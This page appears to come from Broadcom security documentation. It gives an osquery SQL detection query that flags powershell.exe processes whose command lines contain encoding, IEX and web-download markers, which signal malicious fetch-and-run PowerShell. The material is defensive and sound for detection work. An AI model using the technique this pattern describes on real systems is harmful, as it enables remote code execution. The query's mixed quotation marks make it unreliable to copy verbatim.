Built off the open source project Osquery
Description: Detecting malicious powershell.
What The Data Shows: Looking for powershell arguments that can be linked to malicious executions.
SQL:
SELECT *
FROM processes
WHERE cmdline LIKE "%enc%"
AND cmdline LIKE "%IEX%"
AND cmdline LIKE "%web%"
AND name = “powershell.exe”
Copyright © 2005-2023 Broadcom. All Rights Reserved. The term “Broadcom” refers to Broadcom Inc. and/or its subsidiaries.